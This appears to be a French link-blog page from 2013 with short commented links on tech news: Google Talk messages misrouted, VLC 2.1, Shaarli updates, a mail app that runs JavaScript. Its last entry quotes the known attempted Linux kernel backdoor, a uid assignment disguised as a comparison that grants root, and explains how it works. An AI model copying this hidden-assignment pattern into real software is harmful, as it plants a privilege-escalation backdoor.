sebsauvage.net

Google's latest PRIVACY MELTDOWN: Web chats sent to WRONG people • The Register

Thursday 26 September 2013 at 13:21

Oups... gros cafouillage de Google dans GTalk: les messages sont envoyés aux mauvaises personnes ><
Détails: http://bigbrowser.blog.lemonde.fr/2013/09/26/breche-serieux-bug-de-la-discussion-instantanee-de-gmail/#xtor=RSS-32280322
(Permalink)

Source: http://www.theregister.co.uk/2013/09/26/google_gchat_messages_tangled/

Les pages jaunes me font voir rouge - romy.tetue.net

Thursday 26 September 2013 at 11:35

Vous voulez vous retirer de l'annuaire (Page Blanche) ? Non seulement c'est une galère, mais apprêtez-vous à être spammé à mort !
Et oui, France Télécom a vendu les Pages Jaunes à un fond d'investissement américain ><.
Le produit vendu par les Pages Jaunes, c'est vous !
(via Rezo.net)
(Permalink)

Source: http://romy.tetue.net/les-pages-jaunes-me-font-voir-rouge

[Firefox] Gestion des profils

Thursday 26 September 2013 at 10:19

Si vous avez besoin de travailler avec plusieurs profils dans Firefox, voici les lignes de commande.
(Permalink)

Source: http://id-libre.org/shaarli/?gsNMLg

Annuaire de Shaarlis

Thursday 26 September 2013 at 09:45

Oui, il n'y a toujours pas d'annuaire de Shaarlis. Il faudrait y réfléchir.
(Permalink)

Source: http://gilles.wittezaele.fr/paste/?ddd3e93511c383a9#NV/SqqjXIfzY03rVmOe5cn0/AFPqTmrR9Q11u93WsCA=

VideoLAN - VLC 2.1 Rincewind

Thursday 26 September 2013 at 09:15

Nouvelle grosse version de VLC. Notre fidèle VLC.
(Permalink)

Source: http://www.videolan.org/vlc/releases/2.1.0.html

Jackie Chan just posted this on his Facebook - Imgur

Wednesday 25 September 2013 at 23:29

Haha ! Trop bon... Jackie Chan a posté ceci sur sa page Facebook: Il vient de découvrir qu'il est un mème. :-D
(https://www.facebook.com/photo.php?fbid=10151946646137318&set=a.98876792317.90092.30382852317&type=1)
(Permalink)

Source: http://imgur.com/WH5pwfZ

hypocentre -short film- in Vimeo Staff Picks on Vimeo

Wednesday 25 September 2013 at 22:39

Imaginez Paris... totalement vidé de ses habitants. Un peu flippant.
(Permalink)

Source: http://vimeo.com/74857458

[Shaarli] Quelques modifications

Wednesday 25 September 2013 at 21:56

Bon, après les QR-Code qui n'utilisent plus ni jQuery, ni un service externe, j'ai également viré jQuery de la quasi-totalité des pages. (jQuery n'est désormais inclus que dans les pages qui en ont vraiment besoin. Et pour ces pages, il sera dégagé plus tard en réimplémentant les autocompletes et autres).
Gain immédiat: 289 kilo-octets en moins par page ! \o/

Pour mettre à jour, récupérer la dernière version (https://github.com/sebsauvage/Shaarli/archive/master.zip). Supprimez tout sauf votre répertoire "data" et dézippez cette version.
(Permalink)

Source: https://github.com/sebsauvage/Shaarli?date=20130925

Mailbox App for iOS Automatically Executes Javascript | Threatpost

Wednesday 25 September 2013 at 20:18

Quel espèce de crétin développe une application de mail qui exécute automatiquement tout javascript inclus dans les mails reçus ? SÉRIEUSEMENT ??? ><
EDIT: Voir aussi http://nakedsecurity.sophos.com/2013/09/26/mailbox-app-on-ipads-and-iphones-runs-javascript-from-emails-vulnerability-or-feature/
(Permalink)

Source: http://threatpost.com/javascript-issue-plagues-mailbox-app-for-ios/102406

An attempt to backdoor the kernel [LWN.net]

Wednesday 25 September 2013 at 17:16

Ça ressemble à quoi une backdoor dans un Kernel linux ?
C'est aussi simple que remplacer "==" par "=" comme cela a été fait dans ces deux lignes de code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Ce qui ressemblait à l'origine à un contrôle de droits ("L'utilisateur est-il bien root ?") devient "On DONNE les droits root".
Donc n'importe qui qui aurait appelé cette fonction système wait4() avec ces deux flags actifs aurait obtenu l'accès root.

Un seul caractère supprimé, et voilà une backdoor pour obtenir l'accès root sur un système. Devil is in the details.
(Permalink)

Source: http://lwn.net/Articles/57135/